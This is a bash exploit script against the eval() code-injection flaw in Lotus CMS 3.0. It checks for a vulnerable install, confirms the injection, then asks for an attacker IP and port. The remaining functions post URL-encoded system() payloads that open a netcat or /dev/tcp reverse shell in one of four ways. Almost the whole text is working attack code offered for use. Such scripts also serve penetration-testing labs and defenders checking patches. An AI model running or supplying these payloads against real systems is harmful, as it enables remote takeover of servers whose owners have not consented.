#!/bin/bash # Lotus CMS 3.0 eval() Remote Command Execition Exploit # flaw in router() function, original write-up: http://secunia.com/secunia_research/2011-21/ # Scripted in Bash by HR # USAGE: ./lotusRCE.sh target lotusCMS-path # USAGE: ./lotusRCE.sh ki0ptrix3.com / # USAGE: ./lotusRCE.sh /lcms/ # Enter IP and PORT when asked to spawn netcat based reverse shell ;) #Start the magic target="$1" #Target site, ex: or ki0ptrix3.com (no http://) path="$2" # Path to LotusCMS, ex: /lcms/ or / junk=/tmp storage1=$(mktemp -p "$junk" -t fooooobar1.tmp.XXX) storage2=$(mktemp -p "$junk" -t fooooobar2.tmp.XXX) #First a simple Bashtrap function to handle interupt (CTRL+C) trap bashtrap INT bashtrap(){ echo echo echo 'CTRL+C has been detected!.....shutting down now' | grep --color '.....shutting down now' rm -rf "$storage1" rm -rf "$storage2" #exit entire script if called exit 0 } #End bashtrap() page_exists(){ #confirm page exists curl "$target$path/index.php?page=index" -I -o "$storage1" 2> /dev/null cat "$storage1" | sed '2,20d' | cut -d' ' -f2 > "$storage2" 2> /dev/null pageused=$(cat "$storage2") if [ "$pageused" == '200' ]; then echo echo "Path found, now to check for vuln...." | grep --color -E 'Path found||now to check for vuln' echo vuln_check else echo "Provided site and path not found, sorry...." exit; fi } vuln_check(){ # page exists, check if vuln... URLencode: "page=index');${print('abc123')};#" curl $target$path/index.php --data "page=index%27%29%3B%24%7Bprint%28%27Hood3dRob1n%27%29%7D%3B%23" -o "$storage1" 2> /dev/null grep 'Hood3dRob1n' "$storage1" 2> /dev/null 2>&1 if [ "$?" == 0 ]; then echo "Regex found, site is vulnerable to PHP Code Injection!" | grep --color -i -E 'Regex found||site is vulnerable to PHP Code Injection' echo exploit_funk else echo "Unable to find injection in returned results, sorry...." exit; fi } exploit_funk(){ # Vuln confirmed, time to exploit shall we ;) echo "About to try and inject reverse shell...." | grep --color 'About to try and inject reverse shell' echo "what IP to use?" read IP echo "What PORT?" read PORT echo echo "OK, open your local listener and choose the method for back connect: " | grep --color -E 'OK||open your local listener and choose the method for back connect' select reverse_options in "NetCat -e" "NetCat /dev/tcp" "NetCat Backpipe" "NetCat FIFO" "Exit" do case $reverse_options in "NetCat -e") curl $target$path/index.php --data "page=index%27%29%3B%24%7Bsystem%28%27nc%20-e%20%2fbin%2fsh%20$IP%20$PORT%27%29%7D%3B%23%22" 2> /dev/null ;; "NetCat /dev/tcp") curl $target$path/index.php --data "page=index%27%29%3B%24%7Bsystem%28%27%2fbin%2fbash%20-i%20%3E%20%2fdev%2ftcp%2f%24IP%2f%24PORT%200%3C%261%202%3E%261%27%29%7D%3B%23" 2> /dev/null ;; "NetCat Backpipe") curl $target$path/index.php --data "page=index%27%29%3B%24%7Bsystem%28%27mknod%20backpipe%20p%20%26%26%20nc%20%24IP%20%24PORT%200%3Cbackpipe%20%7C%20%2fbin%2fbash%201%3Ebackpipe%27%29%7D%3B%23" 2> /dev/null ;; "NetCat FIFO") curl $target$path/index.php --data "page=index%27%29%3B%24%7Bsystem%28%27mkfifo%20%2ftmp%2ffoo%20%26%26%20cat%20%2ftmp%2ffoo%20%7C%20%2fbin%2fsh%20-i%202%3E%261%20%7C%20nc%20%24IP%20%24PORT%20%3E%20%2ftmp%2ffoo%27%29%7D%3B%23" 2> /dev/null ;; "Exit") echo "got r00t?" exit; ;; esac done } #MAIN clear if [ -z "$1" ] || [ "$1" == '-h' ] || [ "$1" == '--help' ]; then echo echo "USAGE: $0 target LotusCMS_path" | grep --color 'USAGE' echo "EX: $0 /lcms/" | grep --color 'EX' echo "EX: $0 ki0ptrix3.com /" | grep --color 'EX' echo exit; fi page_exists rm -rf "$storage1" rm -rf "$storage2" #EOF